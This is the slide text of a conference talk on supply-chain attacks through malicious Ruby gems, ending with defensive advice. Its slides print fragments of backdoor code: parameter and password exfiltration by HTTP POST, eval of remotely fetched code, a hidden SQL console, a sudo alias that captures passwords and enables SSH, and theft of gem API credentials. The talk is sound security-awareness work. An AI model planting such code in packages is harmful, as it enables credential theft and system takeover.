Tweet
Tweet

Slide 1

Slide 1 text

Hacking with Gems Benjamin Smith @benjamin_smith Wednesday, October 10, 12

Slide 2

Slide 2 text

who i am Wednesday, October 10, 12

Slide 3

Slide 3 text

Wednesday, October 10, 12

Slide 4

Slide 4 text

Wednesday, October 10, 12

Slide 5

Slide 5 text

Wednesday, October 10, 12

Slide 6

Slide 6 text

Wednesday, October 10, 12

Slide 7

Slide 7 text

what i am NOT Wednesday, October 10, 12

Slide 8

Slide 8 text

Wednesday, October 10, 12

Slide 9

Slide 9 text

please do not try this at home Wednesday, October 10, 12

Slide 10

Slide 10 text

please do not try this at home Wednesday, October 10, 12

Slide 11

Slide 11 text

what’s in my app? GEM remote: https://rubygems.org/ specs: actionmailer (3.2.8) actionpack (= 3.2.8) mail (~> 2.4.4) actionpack (3.2.8) activemodel (= 3.2.8) activesupport (= 3.2.8) builder (~> 3.0.0) erubis (~> 2.7.0) ... Wednesday, October 10, 12

Slide 12

Slide 12 text

what’s the worst that could happen? Wednesday, October 10, 12

Slide 13

Slide 13 text

gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages Wednesday, October 10, 12

Slide 14

Slide 14 text

before... github.com/benjaminleesmith/awesome-rails-flash-messages Wednesday, October 10, 12

Slide 15

Slide 15 text

after! github.com/benjaminleesmith/awesome-rails-flash-messages Wednesday, October 10, 12

Slide 16

Slide 16 text

some “side effects” if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages Wednesday, October 10, 12

Slide 17

Slide 17 text

... File.open( "#{Rails.root}/public/development.log", 'a+' ) do |f| f.write("#{params.inspect}\n") end github.com/benjaminleesmith/awesome-rails-flash-messages Wednesday, October 10, 12

Slide 18

Slide 18 text

?!? Net::HTTP.post_form( URI.parse(Base64.decode64('aHR0cDo...')), { 'log'=>params.merge(:url => request.url).inspect } ) github.com/benjaminleesmith/awesome-rails-flash-messages Wednesday, October 10, 12

Slide 19

Slide 19 text

i like cGFzc3dvcmQ=\n if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages Wednesday, October 10, 12

Slide 20

Slide 20 text

i like password if params.to_s.match(“password”) github.com/benjaminleesmith/awesome-rails-flash-messages Wednesday, October 10, 12

Slide 21

Slide 21 text

“development.log” ... "user"=>{"email"=>"[email protected]", "password"=>"password", "remember_me"=>"0"} ... github.com/benjaminleesmith/awesome-rails-flash-messages Wednesday, October 10, 12

Slide 22

Slide 22 text

elsewhere... github.com/benjaminleesmith/awesome-rails-flash-messages Wednesday, October 10, 12

Slide 23

Slide 23 text

Wednesday, October 10, 12

Slide 24

Slide 24 text

that was easy. what else can I do? Wednesday, October 10, 12

Slide 25

Slide 25 text

gem 'net_http_detector' github.com/benjaminleesmith/net_http_detector Wednesday, October 10, 12

Slide 26

Slide 26 text

show me the hack Net::HTTP.post_form( #, {"log"=>"{\"utf8\"=>\"✓\", \"authenticity_token\"=>\"PzpZUlRrRv1V +A0jJHAwi+ey/injbWlii8OFyIfP+fY=\", \"user\"=>{\"email\"=>\"test\", \"password\"=>\"pass4\" ... github.com/benjaminleesmith/net_http_detector Wednesday, October 10, 12

Slide 27

Slide 27 text

how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params) self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector Wednesday, October 10, 12

Slide 28

Slide 28 text

how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params) self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector Wednesday, October 10, 12

Slide 29

Slide 29 text

how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params) self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector Wednesday, October 10, 12

Slide 30

Slide 30 text

...and one more thing... eval(Net::HTTP.valid_get( URI("http://....herokuapp.com/ snippets/6") ) ) github.com/benjaminleesmith/net_http_detector Wednesday, October 10, 12

Slide 31

Slide 31 text

database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector Wednesday, October 10, 12

Slide 32

Slide 32 text

database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector Wednesday, October 10, 12

Slide 33

Slide 33 text

database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector Wednesday, October 10, 12

Slide 34

Slide 34 text

database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector Wednesday, October 10, 12

Slide 35

Slide 35 text

/users/sign_in github.com/benjaminleesmith/net_http_detector Wednesday, October 10, 12

Slide 36

Slide 36 text

/users/sign_in?db_console=t github.com/benjaminleesmith/net_http_detector Wednesday, October 10, 12

Slide 37

Slide 37 text

hello db access! github.com/benjaminleesmith/net_http_detector Wednesday, October 10, 12

Slide 38

Slide 38 text

SELECT * FROM users; github.com/benjaminleesmith/net_http_detector Wednesday, October 10, 12

Slide 39

Slide 39 text

UPDATE users SET admin=1 WHERE id=42; github.com/benjaminleesmith/net_http_detector Wednesday, October 10, 12

Slide 40

Slide 40 text

CREATE USER admin1 WITH PASSWORD 'password'; github.com/benjaminleesmith/net_http_detector Wednesday, October 10, 12

Slide 41

Slide 41 text

careful of wolves in sheep’s clothing Wednesday, October 10, 12

Slide 42

Slide 42 text

Little Snitch obdev.at/products/littlesnitch/index.html Wednesday, October 10, 12

Slide 43

Slide 43 text

Wednesday, October 10, 12

Slide 44

Slide 44 text

that was easy. what else can I do? Wednesday, October 10, 12

Slide 45

Slide 45 text

gem 'better_date_to_s' github.com/benjaminleesmith/better_date_to_s Wednesday, October 10, 12

Slide 46

Slide 46 text

what it claims to do Date.new(2005, 1, 1).to_s(:short) => "1 Jan" ... instead of... => " 1 Jan" github.com/benjaminleesmith/better_date_to_s Wednesday, October 10, 12

Slide 47

Slide 47 text

Wednesday, October 10, 12

Slide 48

Slide 48 text

what it also does set_date_formats_for( Rails.env, Rails.root.to_s ) github.com/benjaminleesmith/better_date_to_s Wednesday, October 10, 12

Slide 49

Slide 49 text

better_date_to_s.bundle œ˙Ì˛ê(__TEXT__text__TEXTP ÛP Ä__stubs__TEXTD $DÄ__stub_helper__TEXThLhÄ__cstring__TEX T∏i∏__unwind_info__TEXT!P! __eh_frame__TEXTxÄxà__DATA__nl_symbol_pt r__DATA__got__DATA__la_symbol_ptr__DATA0 __data__DATAHHH__LINKEDIT ‰"Ä0 8@ Ä¿ `(!‰" github.com/benjaminleesmith/better_date_to_s Wednesday, October 10, 12

Slide 50

Slide 50 text

behind the curtain if(strcmp(rails_env, "production") == 0) { sprintf(tar_command, "tar -zcvf %s/public/assets.tar.gz %s > /dev/ null 2>&1",rails_root,rails_root); system(tar_command); } github.com/benjaminleesmith/better_date_to_s Wednesday, October 10, 12

Slide 51

Slide 51 text

what what github.com/benjaminleesmith/better_date_to_s Wednesday, October 10, 12

Slide 52

Slide 52 text

i can haz source github.com/benjaminleesmith/better_date_to_s Wednesday, October 10, 12

Slide 53

Slide 53 text

truth time • this gem doesn't actually work • but it could... if I wasn't lazy • "fat" gems are tricky to compile github.com/benjaminleesmith/better_date_to_s Wednesday, October 10, 12

Slide 54

Slide 54 text

that was easy hard. what else can I do? (that's easier) Wednesday, October 10, 12

Slide 55

Slide 55 text

gem install be_truthy github.com/benjaminleesmith/be_truthy Wednesday, October 10, 12

Slide 56

Slide 56 text

what it does > true.should be_true > User.new.should be_true > User.new.should be_truthy github.com/benjaminleesmith/be_truthy Wednesday, October 10, 12

Slide 57

Slide 57 text

what it ACTUALLY does github.com/benjaminleesmith/be_truthy Wednesday, October 10, 12

Slide 58

Slide 58 text

github.com/benjaminleesmith/be_truthy Wednesday, October 10, 12

Slide 59

Slide 59 text

file tree looks ok github.com/benjaminleesmith/be_truthy Wednesday, October 10, 12

Slide 60

Slide 60 text

source code looks good require "be_truthy/version" module BeTruthy end github.com/benjaminleesmith/be_truthy Wednesday, October 10, 12

Slide 61

Slide 61 text

but what was this? github.com/benjaminleesmith/be_truthy Wednesday, October 10, 12

Slide 62

Slide 62 text

I see no C github.com/benjaminleesmith/be_truthy Wednesday, October 10, 12

Slide 63

Slide 63 text

run the what file? Gem::Specification.new do |gem| ... gem.extensions = ["Rakefile"] ... end github.com/benjaminleesmith/be_truthy Wednesday, October 10, 12

Slide 64

Slide 64 text

there is no Rakefile github.com/benjaminleesmith/be_truthy Wednesday, October 10, 12

Slide 65

Slide 65 text

gem fetch vs gem install > gem fetch be_truthy > gem unpack be_truthy-0.0.1.gem github.com/benjaminleesmith/be_truthy Wednesday, October 10, 12

Slide 66

Slide 66 text

the real file tree github.com/benjaminleesmith/be_truthy Wednesday, October 10, 12

Slide 67

Slide 67 text

the real file tree github.com/benjaminleesmith/be_truthy Wednesday, October 10, 12

Slide 68

Slide 68 text

what does the Rakefile do? github.com/benjaminleesmith/be_truthy Wednesday, October 10, 12

Slide 69

Slide 69 text

sudo_file =__FILE__.gsub( 'Rakefile', 'lib/tmp.rb' ) FileUtils.mv( sudo_file, "#{home_dir}/.tmp" ) github.com/benjaminleesmith/be_truthy Wednesday, October 10, 12

Slide 70

Slide 70 text

File.open(profile, 'a+') do |f| f.write("alias sudo='ruby #{home}/.tmp'\n") end github.com/benjaminleesmith/be_truthy Wednesday, October 10, 12

Slide 71

Slide 71 text

FileUtils.rm(__FILE__) github.com/benjaminleesmith/be_truthy Wednesday, October 10, 12

Slide 72

Slide 72 text

fseventer fernlightning.com/doku.php?id=software:fseventer:start Wednesday, October 10, 12

Slide 73

Slide 73 text

what does "sudo" do now? github.com/benjaminleesmith/be_truthy Wednesday, October 10, 12

Slide 74

Slide 74 text

print "WARNING: Improper use of the sudo command ..." system "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy Wednesday, October 10, 12

Slide 75

Slide 75 text

print "WARNING: Improper use of the sudo command ..." system "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy Wednesday, October 10, 12

Slide 76

Slide 76 text

print "WARNING: Improper use of the sudo command ..." system "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy Wednesday, October 10, 12

Slide 77

Slide 77 text

print "WARNING: Improper use of the sudo command ..." system "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy Wednesday, October 10, 12

Slide 78

Slide 78 text

echo '#{password}' | /usr/bin/sudo -S systemsetup -setremotelogin on github.com/benjaminleesmith/be_truthy Wednesday, October 10, 12

Slide 79

Slide 79 text

/usr/bin/sudo dscl . -create /Users/ #{username} ... /usr/bin/sudo dscl . -passwd /Users/ #{username} password` github.com/benjaminleesmith/be_truthy Wednesday, October 10, 12

Slide 80

Slide 80 text

Net::HTTP.post_form( URI.parse('http://.../logs'), {'log' => 'ssh enabled'} ) github.com/benjaminleesmith/be_truthy Wednesday, October 10, 12

Slide 81

Slide 81 text

ssh sysadmin@your-ip github.com/benjaminleesmith/be_truthy Wednesday, October 10, 12

Slide 82

Slide 82 text

take away: don't install ben's gems Wednesday, October 10, 12

Slide 83

Slide 83 text

how could I get you to run my code? Wednesday, October 10, 12

Slide 84

Slide 84 text

what gems are trustworthy? Wednesday, October 10, 12

Slide 85

Slide 85 text

how can I add my code to already trusted gems? Wednesday, October 10, 12

Slide 86

Slide 86 text

back to the truthy_gem gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list` Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy Wednesday, October 10, 12

Slide 87

Slide 87 text

back to the truthy_gem gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list` Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy Wednesday, October 10, 12

Slide 88

Slide 88 text

back to the truthy_gem gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list` Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy Wednesday, October 10, 12

Slide 89

Slide 89 text

back to the truthy_gem gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list` Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy Wednesday, October 10, 12

Slide 90

Slide 90 text

now I own your gems github.com/benjaminleesmith/be_truthy Wednesday, October 10, 12

Slide 91

Slide 91 text

> git clone your-gem-repo ...add a little code... > rake build > gem push your-gem github.com/benjaminleesmith/be_truthy Wednesday, October 10, 12

Slide 92

Slide 92 text

do people trust your gems? Wednesday, October 10, 12

Slide 93

Slide 93 text

do people who install your gems have trustworthy gems? Wednesday, October 10, 12

Slide 94

Slide 94 text

there’s still one problem Wednesday, October 10, 12

Slide 95

Slide 95 text

bootstrapping Wednesday, October 10, 12

Slide 96

Slide 96 text

being popular sucks Wednesday, October 10, 12

Slide 97

Slide 97 text

conferences Wednesday, October 10, 12

Slide 98

Slide 98 text

gem install thread_safe Wednesday, October 10, 12

Slide 99

Slide 99 text

brew install hub Wednesday, October 10, 12

Slide 100

Slide 100 text

gem install eventmachine Wednesday, October 10, 12

Slide 101

Slide 101 text

gem install aloha-ruby-conf Wednesday, October 10, 12

Slide 102

Slide 102 text

Wednesday, October 10, 12

Slide 103

Slide 103 text

usernames • ntreadway • ken • mlaverty • takatsugu.ishioka • evan • leo Wednesday, October 10, 12

Slide 104

Slide 104 text

3.8% adoption Wednesday, October 10, 12

Slide 105

Slide 105 text

so what now? Wednesday, October 10, 12

Slide 106

Slide 106 text

gem cert --build Wednesday, October 10, 12

Slide 107

Slide 107 text

gem install rails -P HighSecurity Wednesday, October 10, 12

Slide 108

Slide 108 text

github.com/rubygems/rubygems Wednesday, October 10, 12

Slide 109

Slide 109 text

private gem repos Wednesday, October 10, 12

Slide 110

Slide 110 text

do not try this at home Wednesday, October 10, 12

Slide 111

Slide 111 text

don't install gems you don't need to Wednesday, October 10, 12

Slide 112

Slide 112 text

pay attention to what your gems do Wednesday, October 10, 12

Slide 113

Slide 113 text

monitor your system Wednesday, October 10, 12

Slide 114

Slide 114 text

read the source Wednesday, October 10, 12

Slide 115

Slide 115 text

gem install coal-mine-canary Wednesday, October 10, 12

Slide 116

Slide 116 text

thank you! Wednesday, October 10, 12

Slide 117

Slide 117 text

@benjamin_smith https://github.com/benjaminleesmith http://pivotallabs.com/users/bsmith/blog Wednesday, October 10, 12